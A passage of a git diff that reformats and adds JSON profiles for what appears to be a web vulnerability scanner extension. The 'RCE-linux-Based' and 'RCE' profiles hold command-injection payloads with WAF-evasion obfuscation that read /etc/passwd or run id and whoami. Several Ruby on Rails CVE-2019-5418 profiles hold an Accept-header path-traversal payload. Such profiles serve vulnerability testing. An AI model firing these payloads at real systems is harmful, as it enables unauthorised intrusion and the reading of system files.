+ "TimeOut2": "",
+ "isTime": false,
+ "contentLength": "",
+ "iscontentLength": false,
+ "CaseSensitive": false,
+ "ExcludeHTTP": false,
+ "OnlyHTTP": false,
+ "IsContentType": true,
+ "ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2",
+ "HttpResponseCode": "",
+ "NegativeCT": true,
+ "IsResponseCode": false,
+ "ResponseCode": "",
+ "NegativeRC": false,
+ "urlextension": "",
+ "isurlextension": false,
+ "NegativeUrlExtension": false,
+ "MatchType": 2,
+ "Scope": 2,
+ "RedirType": 0,
+ "MaxRedir": 0,
+ "payloadPosition": 0,
+ "payloadsFile": "",
+ "grepsFile": "",
+ "IssueName": "Private SSH Key",
+ "IssueSeverity": "Information",
+ "IssueConfidence": "Certain",
+ "IssueDetail": "",
+ "RemediationDetail": "",
+ "IssueBackground": "",
+ "RemediationBackground": "",
+ "Header": [],
+ "VariationAttributes": [],
+ "InsertionPointType": [],
+ "Scanas": false,
+ "Scantype": 0,
+ "pathDiscovery": false
+ }
+]
\ No newline at end of file
diff --git a/profiles/RCE-linux-Based.bb b/profiles/RCE-linux-Based.bb
old mode 100644
new mode 100755
index b52f76c..13130e6
--- a/profiles/RCE-linux-Based.bb
+++ b/profiles/RCE-linux-Based.bb
@@ -1 +1,113 @@
-[{"Name":"RCE-linux-Based","Enabled":true,"Scanner":1,"Author":"@Sy3Omda","Payloads":[";cat /e${hahaha}tc/${heywaf}pas${catchthis}swd",";cat$u /etc$u/passwd$u",";{cat,/etc/passwd}",";cat\u003c/etc/passwd",";/???/??t /???/??ss??","%0Acat%20/etc/passwd",";cat$IFS/etc/passwd",";echo${IFS}\"RCE\"${IFS}\u0026\u0026cat${IFS}/etc/passwd",";who$@ami",";w\\ho\\am\\i",";w\"h\"o\"am\"i",";w\u0027h\u0027o\u0027am\u0027i","a;id;","|/bin/ls -al","a;/usr/bin/id;"],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["root:x","www-data"],"Tags":["PathTraversal"],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":1,"RedirType":0,"MaxRedir":0,"payloadPosition":2,"payloadsFile":"","grepsFile":"","IssueName":"RCE-linux-Based","IssueSeverity":"High","IssueConfidence":"Certain","IssueDetail":"Path traversal payload: \u003cbr\u003e \u003cpayload\u003e","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Header":[],"VariationAttributes":[],"InsertionPointType":[18,77,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127,77,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127],"Scantype":0,"pathDiscovery":true}]
\ No newline at end of file
+[
+ {
+ "ProfileName": "RCE-linux-Based",
+ "Name": "",
+ "Enabled": true,
+ "Scanner": 1,
+ "Author": "@Sy3Omda",
+ "Payloads": [
+ "true,;cat /e${hahaha}tc/${heywaf}pas${catchthis}swd",
+ "true,;cat$u /etc$u/passwd$u",
+ "true,;{cat,/etc/passwd}",
+ "true,;cat\u003c/etc/passwd",
+ "true,;/???/??t /???/??ss??",
+ "true,%0Acat%20/etc/passwd",
+ "true,;cat$IFS/etc/passwd",
+ "true,;echo${IFS}\"RCE\"${IFS}\u0026\u0026cat${IFS}/etc/passwd",
+ "true,;who$@ami",
+ "true,;w\\ho\\am\\i",
+ "true,;w\"h\"o\"am\"i",
+ "true,;w\u0027h\u0027o\u0027am\u0027i",
+ "true,a;id;",
+ "true,|/bin/ls -al",
+ "true,a;/usr/bin/id;"
+ ],
+ "Encoder": [],
+ "UrlEncode": false,
+ "CharsToUrlEncode": "",
+ "Grep": [
+ "true,,root:x",
+ "true,Or,www-data"
+ ],
+ "Tags": [
+ "PathTraversal",
+ "All"
+ ],
+ "PayloadResponse": false,
+ "NotResponse": false,
+ "TimeOut1": "",
+ "TimeOut2": "",
+ "isTime": false,
+ "contentLength": "",
+ "iscontentLength": false,
+ "CaseSensitive": false,
+ "ExcludeHTTP": false,
+ "OnlyHTTP": false,
+ "IsContentType": false,
+ "ContentType": "",
+ "HttpResponseCode": "",
+ "NegativeCT": false,
+ "IsResponseCode": false,
+ "ResponseCode": "",
+ "NegativeRC": false,
+ "urlextension": "",
+ "isurlextension": false,
+ "NegativeUrlExtension": false,
+ "MatchType": 1,
+ "Scope": 0,
+ "RedirType": 0,
+ "MaxRedir": 0,
+ "payloadPosition": 2,
+ "payloadsFile": "",
+ "grepsFile": "",
+ "IssueName": "RCE-linux-Based",
+ "IssueSeverity": "High",
+ "IssueConfidence": "Certain",
+ "IssueDetail": "Path traversal payload: \u003cbr\u003e \u003cpayload\u003e",
+ "RemediationDetail": "",
+ "IssueBackground": "",
+ "RemediationBackground": "",
+ "Header": [],
+ "VariationAttributes": [],
+ "InsertionPointType": [
+ 18,
+ 65,
+ 32,
+ 36,
+ 7,
+ 1,
+ 2,
+ 6,
+ 33,
+ 5,
+ 35,
+ 34,
+ 64,
+ 0,
+ 3,
+ 4,
+ 37,
+ 127,
+ 65,
+ 32,
+ 36,
+ 7,
+ 1,
+ 2,
+ 6,
+ 33,
+ 5,
+ 35,
+ 34,
+ 64,
+ 0,
+ 3,
+ 4,
+ 37,
+ 127
+ ],
+ "Scanas": false,
+ "Scantype": 0,
+ "pathDiscovery": false
+ }
+]
\ No newline at end of file
diff --git a/profiles/RCE.bb b/profiles/RCE.bb
index 7ec7950..f1e68e8 100755
--- a/profiles/RCE.bb
+++ b/profiles/RCE.bb
@@ -1 +1,102 @@
-[{"Name":"RCE","Enabled":true,"Scanner":1,"Author":"@egarme","Payloads":[" || id"," | id","; id"," \u0026\u0026 id"," \u0026 id"],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["true,Or,.*uid\u003d.*gid\u003d.*groups\u003d.*"],"Tags":["RCE","All"],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":2,"RedirType":4,"MaxRedir":4,"payloadPosition":2,"payloadsFile":"","grepsFile":"","IssueName":"RCE","IssueSeverity":"High","IssueConfidence":"Certain","IssueDetail":"RCE found","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Header":[],"VariationAttributes":[],"InsertionPointType":[18,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127],"Scantype":0,"pathDiscovery":false}]
\ No newline at end of file
+[
+ {
+ "ProfileName": "RCE",
+ "Name": "",
+ "Enabled": true,
+ "Scanner": 1,
+ "Author": "@egarme",
+ "Payloads": [
+ "true, || id",
+ "true, | id",
+ "true,; id",
+ "true, \u0026\u0026 id",
+ "true, \u0026 id"
+ ],
+ "Encoder": [],
+ "UrlEncode": false,
+ "CharsToUrlEncode": "",
+ "Grep": [
+ "true,,.*uid\u003d.*gid\u003d.*groups\u003d.*"
+ ],
+ "Tags": [
+ "RCE",
+ "All"
+ ],
+ "PayloadResponse": false,
+ "NotResponse": false,
+ "TimeOut1": "",
+ "TimeOut2": "",
+ "isTime": false,
+ "contentLength": "",
+ "iscontentLength": false,
+ "CaseSensitive": false,
+ "ExcludeHTTP": false,
+ "OnlyHTTP": false,
+ "IsContentType": false,
+ "ContentType": "",
+ "HttpResponseCode": "",
+ "NegativeCT": false,
+ "IsResponseCode": false,
+ "ResponseCode": "",
+ "NegativeRC": false,
+ "urlextension": "",
+ "isurlextension": false,
+ "NegativeUrlExtension": false,
+ "MatchType": 2,
+ "Scope": 0,
+ "RedirType": 4,
+ "MaxRedir": 4,
+ "payloadPosition": 2,
+ "payloadsFile": "",
+ "grepsFile": "",
+ "IssueName": "RCE",
+ "IssueSeverity": "High",
+ "IssueConfidence": "Certain",
+ "IssueDetail": "RCE found",
+ "RemediationDetail": "",
+ "IssueBackground": "",
+ "RemediationBackground": "",
+ "Header": [],
+ "VariationAttributes": [],
+ "InsertionPointType": [
+ 18,
+ 65,
+ 32,
+ 36,
+ 7,
+ 1,
+ 2,
+ 6,
+ 33,
+ 5,
+ 35,
+ 34,
+ 64,
+ 0,
+ 3,
+ 4,
+ 37,
+ 127,
+ 65,
+ 32,
+ 36,
+ 7,
+ 1,
+ 2,
+ 6,
+ 33,
+ 5,
+ 35,
+ 34,
+ 64,
+ 0,
+ 3,
+ 4,
+ 37,
+ 127
+ ],
+ "Scanas": false,
+ "Scantype": 0,
+ "pathDiscovery": false
+ }
+]
\ No newline at end of file
diff --git a/profiles/RoR CVE-2019-5418 WAF Bypass.bb b/profiles/RoR CVE-2019-5418 WAF Bypass.bb
new file mode 100755
index 0000000..c5543a5
--- /dev/null
+++ b/profiles/RoR CVE-2019-5418 WAF Bypass.bb
@@ -0,0 +1,70 @@
+[
+ {
+ "ProfileName": "RoR CVE-2019-5418 WAF Bypass",
+ "Name": "",
+ "Enabled": true,
+ "Scanner": 1,
+ "Author": "@egarme",
+ "Payloads": [
+ "true,/"
+ ],
+ "Encoder": [],
+ "UrlEncode": false,
+ "CharsToUrlEncode": "",
+ "Grep": [
+ "true,,root:x"
+ ],
+ "Tags": [
+ "All"
+ ],
+ "PayloadResponse": false,
+ "NotResponse": false,
+ "TimeOut1": "",
+ "TimeOut2": "",
+ "isTime": false,
+ "contentLength": "",
+ "iscontentLength": false,
+ "CaseSensitive": false,
+ "ExcludeHTTP": false,
+ "OnlyHTTP": false,
+ "IsContentType": false,
+ "ContentType": "",
+ "HttpResponseCode": "",
+ "NegativeCT": false,
+ "IsResponseCode": false,
+ "ResponseCode": "",
+ "NegativeRC": false,
+ "urlextension": "",
+ "isurlextension": false,
+ "NegativeUrlExtension": false,
+ "MatchType": 1,
+ "Scope": 0,
+ "RedirType": 4,
+ "MaxRedir": 3,
+ "payloadPosition": 1,
+ "payloadsFile": "",
+ "grepsFile": "",
+ "IssueName": "Ruby on Rails CVE-2019-5418",
+ "IssueSeverity": "High",
+ "IssueConfidence": "Certain",
+ "IssueDetail": "",
+ "RemediationDetail": "",
+ "IssueBackground": "",
+ "RemediationBackground": "",
+ "Header": [
+ {
+ "type": "Request",
+ "match": "Accept: .*",
+ "replace": "Accept: ../../../../../../../../e*c/p*ss*d{{",
+ "regex": "Regex"
+ }
+ ],
+ "VariationAttributes": [],
+ "InsertionPointType": [
+ 65
+ ],
+ "Scanas": false,
+ "Scantype": 0,
+ "pathDiscovery": false
+ }
+]
\ No newline at end of file
diff --git a/profiles/RoR_CVE-2019-5418_WAF_Bypass.bb b/profiles/RoR_CVE-2019-5418_WAF_Bypass.bb
index 432c1d3..950e40d 100755
--- a/profiles/RoR_CVE-2019-5418_WAF_Bypass.bb
+++ b/profiles/RoR_CVE-2019-5418_WAF_Bypass.bb
@@ -1 +1,70 @@
-[{"Name":"RoR_CVE-2019-5418_WAF_Bypass","Enabled":true,"Scanner":1,"Author":"@egarme","Payloads":["/"],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["true,Or,root:x"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":1,"RedirType":4,"MaxRedir":3,"payloadPosition":1,"payloadsFile":"","grepsFile":"","IssueName":"Ruby on Rails CVE-2019-5418","IssueSeverity":"High","IssueConfidence":"Certain","IssueDetail":"","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Header":[{"type":"Request","match":"Accept: .*","replace":"Accept: ../../../../../../../../e*c/p*ss*d{{","regex":"Regex"}],"VariationAttributes":[],"InsertionPointType":[65],"Scantype":0,"pathDiscovery":false}]
\ No newline at end of file
+[
+ {
+ "ProfileName": "RoR_CVE-2019-5418_WAF_Bypass",
+ "Name": "",
+ "Enabled": true,
+ "Scanner": 1,
+ "Author": "@egarme",
+ "Payloads": [
+ "true,/"
+ ],
+ "Encoder": [],
+ "UrlEncode": false,
+ "CharsToUrlEncode": "",
+ "Grep": [
+ "true,,root:x"
+ ],
+ "Tags": [
+ "All"
+ ],
+ "PayloadResponse": false,
+ "NotResponse": false,
+ "TimeOut1": "",
+ "TimeOut2": "",
+ "isTime": false,
+ "contentLength": "",
+ "iscontentLength": false,
+ "CaseSensitive": false,
+ "ExcludeHTTP": false,
+ "OnlyHTTP": false,
+ "IsContentType": false,
+ "ContentType": "",
+ "HttpResponseCode": "",
+ "NegativeCT": false,
+ "IsResponseCode": false,
+ "ResponseCode": "",
+ "NegativeRC": false,
+ "urlextension": "",
+ "isurlextension": false,
+ "NegativeUrlExtension": false,
+ "MatchType": 1,
+ "Scope": 0,
+ "RedirType": 4,
+ "MaxRedir": 3,
+ "payloadPosition": 1,
+ "payloadsFile": "",
+ "grepsFile": "",
+ "IssueName": "Ruby on Rails CVE-2019-5418",
+ "IssueSeverity": "High",
+ "IssueConfidence": "Certain",
+ "IssueDetail": "",
+ "RemediationDetail": "",
+ "IssueBackground": "",
+ "RemediationBackground": "",
+ "Header": [
+ {
+ "type": "Request",
+ "match": "Accept: .*",
+ "replace": "Accept: ../../../../../../../../e*c/p*ss*d{{",
+ "regex": "Regex"
+ }
+ ],
+ "VariationAttributes": [],
+ "InsertionPointType": [
+ 65
+ ],
+ "Scanas": false,
+ "Scantype": 0,
+ "pathDiscovery": false
+ }
+]
\ No newline at end of file
diff --git a/profiles/Ruby on Rails CVE-2019-5418.bb b/profiles/Ruby on Rails CVE-2019-5418.bb
new file mode 100755
index 0000000..5dd5917
--- /dev/null
+++ b/profiles/Ruby on Rails CVE-2019-5418.bb
@@ -0,0 +1,104 @@
+[
+ {
+ "ProfileName": "Ruby on Rails CVE-2019-5418",
+ "Name": "",
+ "Enabled": true,
+ "Scanner": 1,
+ "Author": "@egarme",
+ "Payloads": [
+ "true,/"
+ ],
+ "Encoder": [],
+ "UrlEncode": false,
+ "CharsToUrlEncode": "",
+ "Grep": [
+ "true,,root:x"
+ ],
+ "Tags": [
+ "All"
+ ],
+ "PayloadResponse": false,
+ "NotResponse": false,
+ "TimeOut1": "",
+ "TimeOut2": "",
+ "isTime": false,
+ "contentLength": "",
+ "iscontentLength": false,
+ "CaseSensitive": false,
+ "ExcludeHTTP": false,
+ "OnlyHTTP": false,
+ "IsContentType": false,
+ "ContentType": "",
+ "HttpResponseCode": "",
+ "NegativeCT": false,
+ "IsResponseCode": false,
+ "ResponseCode": "",
+ "NegativeRC": false,
+ "urlextension": "",
+ "isurlextension": false,
+ "NegativeUrlExtension": false,
+ "MatchType": 1,
+ "Scope": 0,
+ "RedirType": 4,
+ "MaxRedir": 3,
+ "payloadPosition": 1,
+ "payloadsFile": "",
+ "grepsFile": "",
+ "IssueName": "Ruby on Rails CVE-2019-5418",
+ "IssueSeverity": "High",
+ "IssueConfidence": "Certain",
+ "IssueDetail": "",
+ "RemediationDetail": "",
+ "IssueBackground": "",
+ "RemediationBackground": "",
+ "Header": [
+ {
+ "type": "Request",
+ "match": "Accept: .*",
+ "replace": "Accept: ../../../../../../../../etc/passwd{{",
+ "regex": "Regex"
+ }
+ ],
+ "VariationAttributes": [],
+ "InsertionPointType": [
+ 18,
+ 65,
+ 32,
+ 36,
+ 7,
+ 1,
+ 2,
+ 6,
+ 33,
+ 5,
+ 35,
+ 34,
+ 64,
+ 0,
+ 3,
+ 4,
+ 37,
+ 127,
+ 65,
+ 32,
+ 36,
+ 7,
+ 1,
+ 2,
+ 6,
+ 33,
+ 5,
+ 35,
+ 34,
+ 64,
+ 0,
+ 3,
+ 4,
+ 37,
+ 127
+ ],
+ "Scanas": false,
+ "Scantype": 0,
+ "pathDiscovery": false
+ }
+]
\ No newline at end of file
diff --git a/profiles/Ruby_on_Rails_CVE-2019-5418.bb b/profiles/Ruby_on_Rails_CVE-2019-5418.bb
old mode 100644
new mode 100755
index 6bd9c6d..ccf66f9
--- a/profiles/Ruby_on_Rails_CVE-2019-5418.bb
+++ b/profiles/Ruby_on_Rails_CVE-2019-5418.bb
@@ -1 +1,104 @@
-[{"Name":"Ruby_on_Rails_CVE-2019-5418","Enabled":true,"Scanner":1,"Author":"@egarme","Payloads":["/"],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["root:x"],"Tags":[],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":1,"RedirType":4,"MaxRedir":3,"payloadPosition":1,"payloadsFile":"","grepsFile":"","IssueName":"Ruby on Rails CVE-2019-5418","IssueSeverity":"High","IssueConfidence":"Certain","IssueDetail":"","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Header":[{"type":"Request","match":"Accept: .*","replace":"Accept: ../../../../../../../../etc/passwd{{","regex":"Regex"}],"VariationAttributes":[],"InsertionPointType":[18,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127],"Scantype":0,"pathDiscovery":false}]
\ No newline at end of file
+[
+ {
+ "ProfileName": "Ruby_on_Rails_CVE-2019-5418",
+ "Name": "",
+ "Enabled": true,
+ "Scanner": 1,
+ "Author": "@egarme",
+ "Payloads": [
+ "true,/"
+ ],
+ "Encoder": [],
+ "UrlEncode": false,
+ "CharsToUrlEncode": "",
+ "Grep": [
+ "true,,root:x"
+ ],
+ "Tags": [
+ "All"
+ ],
+ "PayloadResponse": false,
+ "NotResponse": false,
+ "TimeOut1": "",
+ "TimeOut2": "",
+ "isTime": false,
+ "contentLength": "",
+ "iscontentLength": false,
+ "CaseSensitive": false,
+ "ExcludeHTTP": false,
+ "OnlyHTTP": false,
+ "IsContentType": false,
+ "ContentType": "",
+ "HttpResponseCode": "",
+ "NegativeCT": false,
+ "IsResponseCode": false,
+ "ResponseCode": "",
+ "NegativeRC": false,
+ "urlextension": "",
+ "isurlextension": false,
+ "NegativeUrlExtension": false,
+ "MatchType": 1,
+ "Scope": 0,
+ "RedirType": 4,
+ "MaxRedir": 3,
+ "payloadPosition": 1,
+ "payloadsFile": "",
+ "grepsFile": "",
+ "IssueName": "Ruby on Rails CVE-2019-5418",
+ "IssueSeverity": "High",
+ "IssueConfidence": "Certain",
+ "IssueDetail": "",
+ "RemediationDetail": "",
+ "IssueBackground": "",
+ "RemediationBackground": "",
+ "Header": [
+ {
+ "type": "Request",
+ "match": "Accept: .*",
+ "replace": "Accept: ../../../../../../../../etc/passwd{{",
+ "regex": "Regex"
+ }
+ ],
+ "VariationAttributes": [],
+ "InsertionPointType": [
+ 18,
+ 65,
+ 32,
+ 36,
+ 7,
+ 1,
+ 2,
+ 6,
+ 33,
+ 5,
+ 35,
+ 34,
+ 64,
+ 0,
+ 3,
+ 4,
+ 37,
+ 127,
+ 65,
+ 32,
+ 36,
+ 7,
+ 1,
+ 2,
+ 6,
+ 33,
+ 5,
+ 35,
+ 34,
+ 64,
+ 0,
+ 3,
+ 4,
+ 37,
+ 127
+ ],
+ "Scanas": false,
+ "Scantype": 0,
+ "pathDiscovery": false
+ }
+]
\ No newline at end of file
diff --git a/profiles/SQL_Message_Detected.bb b/profiles/SQL_Message_Detected.bb
old mode 100644
new mode 100755
index bae06f8..4e5994d
--- a/profiles/SQL_Message_Detected.bb
+++ b/profiles/SQL_Message_Detected.bb
@@ -1 +1,59 @@
-[{"Name":"SQL_Message_Detected","Enabled":true,"Scanner":2,"Author":"@six2dez1","UrlEncode":false,"Grep":["true,Or,(Exception (condition )?\\d+\\. Transaction rollback|com\\.frontbase\\.jdbc|org\\.h2\\.jdbc|Unexpected end of command in statement \\[\"|Unexpected token.*?in statement \\[|org\\.hsqldb\\.jdbc|CLI Driver.*?DB2|DB2 SQL error|\\bdb2_\\w+\\(|SQLSTATE.+SQLCODE|com\\.ibm\\.db2\\.jcc|Zend_Db_(Adapter|Statement)_Db2_Exception|Pdo[./_\\\\]Ibm|DB2Exception|Warning.*?\\Wifx_|Exception.*?Informix|Informix ODBC Driver|ODBC Informix driver|com\\.informix\\.jdbc|weblogic\\.jdbc\\.informix|Pdo[./_\\\\]Informix|IfxException|Warning.*?\\Wingres_|Ingres SQLSTATE|Ingres\\W.*?Driver|com\\.ingres\\.gcf\\.jdbc|Dynamic SQL Error|Warning.*?\\Wibase_|org\\.firebirdsql\\.jdbc|Pdo[./_\\\\]Firebird|Microsoft Access (\\d+ )?Driver|JET Database Engine|Access Database Engine|ODBC Microsoft Access|Syntax error \\(missing operator\\) in query expression|Driver.*? SQL[\\-\\_\\ ]*Server|OLE DB.*? SQL Server|\\bSQL Server[^\u0026lt;\u0026quot;]+Driver|Warning.*?\\W(mssql|sqlsrv)_|\\bSQL Server[^\u0026lt;\u0026quot;]+[0-9a-fA-F]{8}|System\\.Data\\.SqlClient\\.SqlException|(?s)Exception.*?\\bRoadhouse\\.Cms\\.|Microsoft SQL Native Client error \u0027[0-9a-fA-F]{8}|\\[SQL Server\\]|ODBC SQL Server Driver|ODBC Driver \\d+ for SQL Server|SQLServer JDBC Driver|com\\.jnetdirect\\.jsql|macromedia\\.jdbc\\.sqlserver|Zend_Db_(Adapter|Statement)_Sqlsrv_Exception|com\\.microsoft\\.sqlserver\\.jdbc|Pdo[./_\\\\](Mssql|SqlSrv)|SQL(Srv|Server)Exception|SQL syntax.*?MySQL|Warning.*?\\Wmysqli?_|MySQLSyntaxErrorException|valid MySQL result|check the manual that corresponds to your (MySQL|MariaDB) server version|Unknown column \u0027[^ ]+\u0027 in \u0027field list\u0027|MySqlClient\\.|com\\.mysql\\.jdbc|Zend_Db_(Adapter|Statement)_Mysqli_Exception|Pdo[./_\\\\]Mysql|MySqlException|\\bORA-\\d{5}|Oracle error|Oracle.*?Driver|Warning.*?\\W(oci|ora)_|quoted string not properly terminated|SQL command not properly ended|macromedia\\.jdbc\\.oracle|oracle\\.jdbc|Zend_Db_(Adapter|Statement)_Oracle_Exception|Pdo[./_\\\\](Oracle|OCI)|OracleException|PostgreSQL.*?ERROR|Warning.*?\\Wpg_|valid PostgreSQL result|Npgsql\\.|PG::SyntaxError:|org\\.postgresql\\.util\\.PSQLException|ERROR:\\s\\ssyntax error at or near|ERROR: parser: parse error at or near|PostgreSQL query failed|org\\.postgresql\\.jdbc|Pdo[./_\\\\]Pgsql|PSQLException|SQL error.*?POS([0-9]+)|Warning.*?\\Wmaxdb_|DriverSapDB|com\\.sap\\.dbtech\\.jdbc|SQLite/JDBCDriver|SQLite\\.Exception|(Microsoft|System)\\.Data\\.SQLite\\.SQLiteException|Warning.*?\\W(sqlite_|SQLite3::)|\\[SQLITE_ERROR\\]|SQLite error \\d+:|sqlite3.OperationalError:|SQLite3::SQLException|org\\.sqlite\\.JDBC|Pdo[./_\\\\]Sqlite|SQLiteException|Warning.*?\\Wsybase_|Sybase message|Sybase.*?Server message|SybSQLException|Sybase\\.Data\\.AseClient|com\\.sybase\\.jdbc)"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"isTime":false,"iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":true,"OnlyHTTP":false,"IsContentType":true,"ContentType":"text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2","NegativeCT":true,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":2,"RedirType":0,"MaxRedir":0,"payloadPosition":0,"grepsFile":"","IssueName":"SQL Text Detected","IssueSeverity":"Information","IssueConfidence":"Certain","IssueDetail":"","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","VariationAttributes":[],"InsertionPointType":[],"Scantype":0,"pathDiscovery":false}]
\ No newline at end of file
+[
+ {
+ "ProfileName": "SQL_Message_Detected",
+ "Name": "",
+ "Enabled": true,
+ "Scanner": 2,
+ "Author": "@six2dez1",
+ "Payloads": [],
+ "Encoder": [],
+ "UrlEncode": false,
+ "CharsToUrlEncode": "",
+ "Grep": [
+ "true,,(Exception (condition )?\\d+\\. Transaction rollback|com\\.frontbase\\.jdbc|org\\.h2\\.jdbc|Unexpected end of command in statement \\[\"|Unexpected token.*?in statement \\[|org\\.hsqldb\\.jdbc|CLI Driver.*?DB2|DB2 SQL error|\\bdb2_\\w+\\(|SQLSTATE.+SQLCODE|com\\.ibm\\.db2\\.jcc|Zend_Db_(Adapter|Statement)_Db2_Exception|Pdo[./_\\\\]Ibm|DB2Exception|Warning.*?\\Wifx_|Exception.*?Informix|Informix ODBC Driver|ODBC Informix driver|com\\.informix\\.jdbc|weblogic\\.jdbc\\.informix|Pdo[./_\\\\]Informix|IfxException|Warning.*?\\Wingres_|Ingres SQLSTATE|Ingres\\W.*?Driver|com\\.ingres\\.gcf\\.jdbc|Dynamic SQL Error|Warning.*?\\Wibase_|org\\.firebirdsql\\.jdbc|Pdo[./_\\\\]Firebird|Microsoft Access (\\d+ )?Driver|JET Database Engine|Access Database Engine|ODBC Microsoft Access|Syntax error \\(missing operator\\) in query expression|Driver.*? SQL[\\-\\_\\ ]*Server|OLE DB.*? SQL Server|\\bSQL Server[^\u0026lt;\u0026quot;]+Driver|Warning.*?\\W(mssql|sqlsrv)_|\\bSQL Server[^\u0026lt;\u0026quot;]+[0-9a-fA-F]{8}|System\\.Data\\.SqlClient\\.SqlException|(?s)Exception.*?\\bRoadhouse\\.Cms\\.|Microsoft SQL Native Client error \u0027[0-9a-fA-F]{8}|\\[SQL Server\\]|ODBC SQL Server Driver|ODBC Driver \\d+ for SQL Server|SQLServer JDBC Driver|com\\.jnetdirect\\.jsql|macromedia\\.jdbc\\.sqlserver|Zend_Db_(Adapter|Statement)_Sqlsrv_Exception|com\\.microsoft\\.sqlserver\\.jdbc|Pdo[./_\\\\](Mssql|SqlSrv)|SQL(Srv|Server)Exception|SQL syntax.*?MySQL|Warning.*?\\Wmysqli?_|MySQLSyntaxErrorException|valid MySQL result|check the manual that corresponds to your (MySQL|MariaDB) server version|Unknown column \u0027[^ ]+\u0027 in \u0027field list\u0027|MySqlClient\\.|com\\.mysql\\.jdbc|Zend_Db_(Adapter|Statement)_Mysqli_Exception|Pdo[./_\\\\]Mysql|MySqlException|\\bORA-\\d{5}|Oracle error|Oracle.*?Driver|Warning.*?\\W(oci|ora)_|quoted string not properly terminated|SQL command not properly ended|macromedia\\.jdbc\\.oracle|oracle\\.jdbc|Zend_Db_(Adapter|Statement)_Oracle_Exception|Pdo[./_\\\\](Oracle|OCI)|OracleException|PostgreSQL.*?ERROR|Warning.*?\\Wpg_|valid PostgreSQL result|Npgsql\\.|PG::SyntaxError:|org\\.postgresql\\.util\\.PSQLException|ERROR:\\s\\ssyntax error at or near|ERROR: parser: parse error at or near|PostgreSQL query failed|org\\.postgresql\\.jdbc|Pdo[./_\\\\]Pgsql|PSQLException|SQL error.*?POS([0-9]+)|Warning.*?\\Wmaxdb_|DriverSapDB|com\\.sap\\.dbtech\\.jdbc|SQLite/JDBCDriver|SQLite\\.Exception|(Microsoft|System)\\.Data\\.SQLite\\.SQLiteException|Warning.*?\\W(sqlite_|SQLite3::)|\\[SQLITE_ERROR\\]|SQLite error \\d+:|sqlite3.OperationalError:|SQLite3::SQLException|org\\.sqlite\\.JDBC|Pdo[./_\\\\]Sqlite|SQLiteException|Warning.*?\\Wsybase_|Sybase message|Sybase.*?Server message|SybSQLException|Sybase\\.Data\\.AseClient|com\\.sybase\\.jdbc)"
+ ],
+ "Tags": [
+ "All"
+ ],
+ "PayloadResponse": false,
+ "NotResponse": false,
+ "TimeOut1": "",
+ "TimeOut2": "",
+ "isTime": false,
+ "contentLength": "",
+ "iscontentLength": false,
+ "CaseSensitive": false,
+ "ExcludeHTTP": true,
+ "OnlyHTTP": false,
+ "IsContentType": true,
+ "ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2",
+ "HttpResponseCode": "",
+ "NegativeCT": true,
+ "IsResponseCode": false,
+ "ResponseCode": "",
+ "NegativeRC": false,
+ "urlextension": "",
+ "isurlextension": false,
+ "NegativeUrlExtension": false,
+ "MatchType": 2,
+ "Scope": 2,
+ "RedirType": 0,
+ "MaxRedir": 0,
+ "payloadPosition": 0,
+ "payloadsFile": "",
+ "grepsFile": "",
+ "IssueName": "SQL Text Detected",
+ "IssueSeverity": "Information",
+ "IssueConfidence": "Certain",
+ "IssueDetail": "",
+ "RemediationDetail": "",
+ "IssueBackground": "",
+ "RemediationBackground": "",
+ "Header": [],
+ "VariationAttributes": [],
+ "InsertionPointType": [],
+ "Scanas": false,
+ "Scantype": 0,
+ "pathDiscovery": false
+ }
+]
\ No newline at end of file
diff --git a/profiles/SQLi-Error-SQLmap.bb b/profiles/SQLi-Error-SQLmap.bb
index eca1504..03a417f 100755
--- a/profiles/SQLi-Error-SQLmap.bb
